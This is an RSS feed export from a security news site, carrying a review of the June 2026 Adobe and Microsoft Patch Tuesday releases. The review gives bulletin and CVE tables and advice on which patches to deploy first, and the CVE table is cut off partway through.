<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=windowsdna+verstndlich+registry%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 19:46:11 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 19:46:11 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=windowsdna+verstndlich+registry%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=windowsdna+verstndlich+registry%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[The June 2026 Security Update Review]]></title>
<description><![CDATA[I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a ...]]></description>
<link>https://tsecurity.de/de/3694563/hacking/the-june-2026-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694563/hacking/the-june-2026-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:53 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a look at the latest security patches from Adobe and Microsoft. If you’d rather watch the full video recap covering the entire release, you can check it out here:</p>





















  
  




  
















  
    
      
    
    
      
        
      
    
    
    



  






  <p class=""><strong>Adobe Patches for June 2026</strong></p><p class="">For June, Adobe released 11 bulletins addressing 123 unique CVEs in Adobe Acrobat Reader, ColdFusion, Experience Manager, Experience Manager Forms, InDesign, InCopy, Substance 3D Sampler, Content Credentials SDK, Dreamweaver, Format Plugins, and Adobe Campaign Classic. A total of 11 of these CVEs were reported through the ZDI program.</p><p class="">Here’s this month’s overview table:</p>





















  
  




  


  
    


<table>
<colgroup>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
</colgroup>
<thead>
  <tr>
    <th>Bulletin ID</th>
    <th>Product</th>
    <th>CVE Count</th>
    <th>Highest Severity</th>
    <th>Highest CVSS</th>
    <th>Exploited</th>
    <th>Deployment Priority</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/campaign/apsb26-66.html" target="_blank">APSB26-66</a></td>
    <td>Adobe Campaign Classic</td>
    <td>2</td>
    <td>Critical</td>
    <td>10.0</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/coldfusion/apsb26-64.html" target="_blank">APSB26-64</a></td>
    <td>Adobe ColdFusion</td>
    <td>7</td>
    <td>Critical</td>
    <td>9.6</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/acrobat/apsb26-63.html" target="_blank">APSB26-63</a></td>
    <td>Adobe Acrobat Reader</td>
    <td>20</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/aem-forms/apsb26-57.html" target="_blank">APSB26-57</a></td>
    <td>Adobe Experience Manager Forms</td>
    <td>3</td>
    <td>Critical</td>
    <td>9.3</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/dreamweaver/apsb26-62.html" target="_blank">APSB26-62</a></td>
    <td>Adobe Dreamweaver</td>
    <td>5</td>
    <td>Critical</td>
    <td>8.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/formatplugins/apsb26-65.html" target="_blank">APSB26-65</a></td>
    <td>Adobe Format Plugins</td>
    <td>2</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/incopy/apsb26-59.html" target="_blank">APSB26-59</a></td>
    <td>Adobe InCopy</td>
    <td>3</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/indesign/apsb26-58.html" target="_blank">APSB26-58</a></td>
    <td>Adobe InDesign</td>
    <td>12</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/substance3d-sampler/apsb26-60.html" target="_blank">APSB26-60</a></td>
    <td>Adobe Substance 3D Sampler</td>
    <td>4</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/content-authenticity-sdk/apsb26-61.html" target="_blank">APSB26-61</a></td>
    <td>Content Credentials SDK</td>
    <td>8</td>
    <td>Critical</td>
    <td>7.5</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/experience-manager/apsb26-56.html" target="_blank">APSB26-56</a></td>
    <td>Adobe Experience Manager</td>
    <td>57</td>
    <td>Important</td>
    <td>5.4</td>
    <td>No</td>
    <td>3</td>
  </tr>
</tbody>
<tfoot>
  <tr>
    <td>TOTAL</td>
    <td>11 bulletins</td>
    <td>123</td>
    <td></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
</tfoot>
</table>



  
  









  <p class="">Obviously, the update for Campaign Classic should be on the top of your deployment list if you’re a user. A CVSS 10 is rare; two in the same bulletin is pretty much a unicorn. Adobe says there are no active attacks, but I would expect heavy research into creating one. The update for Coldfusion is also a Priority 1, but again, no known attacks is the wild. I suspect the Reader patch will also receive a lot of attention as malicious PDFs are common in ransomware attacks. The update for Experience Manager may be large, but it’s mostly just cross-site scripting (XSS) bugs.</p><p class=""><strong>Microsoft Patches for June 2026</strong></p><p class="">This month, Microsoft released a new record 208 CVEs Windows and Windows components, Office and Office Components, Microsoft Edge (Chromium-based), Azure, .NET and Visual Studio, Github Copilot, Defender, Exchange Server, Hyper-V, Secure Boot, and BitLocker. At least, that’s my count. Microsoft’s tools seem to be having some issues, as they initially included a CVE from 2020 in this release. Regardless, the count is over 200, and I counted several times.</p><p class="">One of these bugs came through the ZDI program, but bugs submitted during Pwn2Own Berlin remain unpatched. If you include the Chromium and other third-party bugs, the total CVE count for June comes to a staggering 571 CVEs. 38 of these cases are rated Critical while the rest are rated Important in severity.</p><p class="">I’ve been counting CVEs on Patch Tuesday since 2017, and this is by far the largest monthly release in that time. The previous record was 177 set last year. It is extraordinary that Microsoft can produce so many patches in a single month, but it does raise concerns. How many of these cases were found using AI tools? How many patches were generated using AI to assist in coding or testing? What quality issues may exist in these patches? And likely most importantly, is this the new normal? The last two months were also large releases. Should sysadmins adjust their processes for prioritization and patch deployment based on this new volume of updates? Unfortunately, Microsoft is not providing those answers right now. Hopefully that changes in the future. BTW – just a note – the current number of CVEs shipped by Microsoft this year exceeds the total number of CVEs shipped in all of 2018.</p><p class="">One of the bugs patched by Microsoft this month is listed as under active exploitation and three others are listed as publicly known at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the bug being exploited in the wild.</p><p class="">-   <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><strong>CVE-2026-41091</strong></a><strong> - Microsoft Defender Elevation of Privilege Vulnerability<br></strong>Since Microsoft doesn’t provide info on how widespread exploitation is, we must read some tea leaves. For this patch, several different people were acknowledged, which indicates multiple parties say this is in the wild, meaning exploitation is likely significant. The good news is that most people won’t need to take action as Defender updates itself. However, if you don’t have this configured or are in an isolated environment, you’ll need to update to the latest version.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657"><strong>CVE-2026-45657</strong></a><strong> - Windows Kernel Remote Code Execution Vulnerability<br></strong>This CVSS 9.8 bug allows remote, unauthenticated attackers to execute code at SYSTEM level without user interaction. Yup – this is wormable. The problem lies in the way the kernel handles TCP/IP. This was listed as “Exploitation Less Likely” by Microsoft, but rest assured that every researcher and bug shop on the planet is reversing this patch right now trying to create an exploit. Test and deploy this patch quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><strong>CVE-2026-47291</strong></a><strong> - HTTP.sys Remote Code Execution Vulnerability<br></strong>Our second CVSS 9.8 bug of the month, this also allows remote, unauthenticated attackers to execute code on affected systems without user interaction. However, there is a caveat. Systems using the default MaxRequestBytes registry value used by the Windows HTTP stack are not affected by this bug. You can edit your registry settings if you need protection while you test and deploy the patch. The bulletin includes instructions and even a PowerShell script for doing this action. Microsoft lists this as “Exploitation more likely”, so I would definitely check your registry settings.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><strong>CVE-2026-44815</strong></a><strong> - DHCP Client Service Remote Code Execution Vulnerability<br></strong>Here’s another CVSS 9.8 that has an odd incongruity. Although the CVSS says no permissions are required for exploitation, the write-up states it must be an “authenticated” user. I would err on the side of caution here and believe the CVSS. If that’s correct, then we have another bug where a remote, unauthenticated attacker could execute code on affected systems without user interaction. And since the DHCP client is on every OS, it’s a juicy target. This is another one to test and deploy with haste.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45585"><strong>CVE-2026-45585</strong></a><strong>/</strong><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><strong>CVE-2026-50507</strong></a><strong> - Windows BitLocker Security Feature Bypass Vulnerability<br></strong>If you’ve followed the ongoing saga of Nightmare Eclipse vs. MSRC, the bugs should look familiar. One is definitely a fix for “YellowKey”, while the other appears to be a fix for “GreenPlasma”. The researcher has promised a “<a href="https://www.theregister.com/security/2026/05/28/microsoft-0-day-feud-escalates-as-researcher-threatens-another-windows-exploit-dump/5248085">bone shattering</a>” drop on June 14, so let’s hope Microsoft is able to reach some understanding with the researcher before more 0-days are released. Also, there is a script provided by Microsoft as a mitigation, but the better strategy is to test and deploy the updates.</p><p class=""> Here’s the full list of CVEs released by Microsoft for June 2026:</p>





















  
  




  


  
    





<link rel="File-List" href="new2026-Jun-cvrf2.fld/filelist.xml">













<table border="0" cellpadding="0" cellspacing="0" width="1024">
 <col width="144">
 <col width="256">
 <col width="104" span="6">
 <tr height="47">
  <td width="144" class="xl65" height="47">CVE</td>
  <td width="256" class="xl65">Title</td>
  <td width="104" class="xl66">Severity</td>
  <td width="104" class="xl66">CVSS</td>
  <td width="104" class="xl66">Public</td>
  <td width="104" class="xl66">Exploited</td>
  <td width="104" class="xl66">XI</td>
  <td width="104" class="xl66">Type</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><span>CVE-2026-41091</span></a></td>
  <td width="256" class="xl68">Microsoft Defender
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl71">Yes</td>
  <td class="xl70">0</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49160"><span>CVE-2026-49160</span></a></td>
  <td width="256" class="xl68">HTTP.sys Denial of
  Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><span>CVE-2026-50507</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45586"><span>CVE-2026-45586</span></a></td>
  <td width="256" class="xl68">Windows Collaborative
  Translation Framework (CTFMON) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="91">
  <td class="xl67" height="91"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-10263"><span>CVE-2025-10263 *</span></a></td>
  <td width="256" class="xl68">ARM: CVE-2025-10263
  Completion of affected memory accesses might not be guaranteed by completion
  of a TLBI [kernel]</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48567"><span>CVE-2026-48567</span></a></td>
  <td width="256" class="xl68">Azure HorizonDB<span>  </span>Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">10</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32193"><span>CVE-2026-32193</span></a></td>
  <td width="256" class="xl68">Azure Kubernetes
  Service (AKS) Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47644"><span>CVE-2026-47644</span></a></td>
  <td width="256" class="xl68">Copilot Chat
  (Microsoft Edge) Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><span>CVE-2026-44815</span></a></td>
  <td width="256" class="xl68">DHCP Client Service
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><span>CVE-2026-47291</span></a></td>
  <td width="256" class="xl68">HTTP.sys Remote Code
  Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42824"><span>CVE-2026-42824</span></a></td>
  <td width="256" class="xl68">M365 Copilot
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45476"><span>CVE-2026-45476</span></a></td>
  <td width="256" class="xl68">Microsoft Azure
  Network Adapter Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44810"><span>CVE-2026-44810</span></a></td>
  <td width="256" class="xl68">Microsoft
  Cryptographic Services Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48579"><span>CVE-2026-48579</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Online Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47655"><span>CVE-2026-47655</span></a></td>
  <td width="256" class="xl68">Microsoft Graph
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45497"><span>CVE-2026-45497</span></a></td>
  <td width="256" class="xl68">Microsoft M365 Copilot
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45460"><span>CVE-2026-45460</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">4.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45472"><span>CVE-2026-45472</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45474"><span>CVE-2026-45474</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45461"><span>CVE-2026-45461</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45463"><span>CVE-2026-45463</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45456"><span>CVE-2026-45456</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45458"><span>CVE-2026-45458</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47635"><span>CVE-2026-47635</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26142"><span>CVE-2026-26142</span></a></td>
  <td width="256" class="xl68">Nuance PowerScribe
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47289"><span>CVE-2026-47289</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47654"><span>CVE-2026-47654</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48563"><span>CVE-2026-48563</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42992"><span>CVE-2026-42992</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44799"><span>CVE-2026-44799</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44801"><span>CVE-2026-44801</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42985"><span>CVE-2026-42985</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45648"><span>CVE-2026-45648</span></a></td>
  <td width="256" class="xl68">Windows Active
  Directory Domain Services Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42987"><span>CVE-2026-42987</span></a></td>
  <td width="256" class="xl68">Windows Deployment
  Services (WDS) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33828"><span>CVE-2026-33828</span></a></td>
  <td width="256" class="xl68">Windows Device Health
  Attestation (DHA) Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44803"><span>CVE-2026-44803</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44812"><span>CVE-2026-44812</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45607"><span>CVE-2026-45607</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45641"><span>CVE-2026-45641</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47652"><span>CVE-2026-47652</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47288"><span>CVE-2026-47288</span></a></td>
  <td width="256" class="xl68">Windows Kerberos Key
  Distribution Center (KDC) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
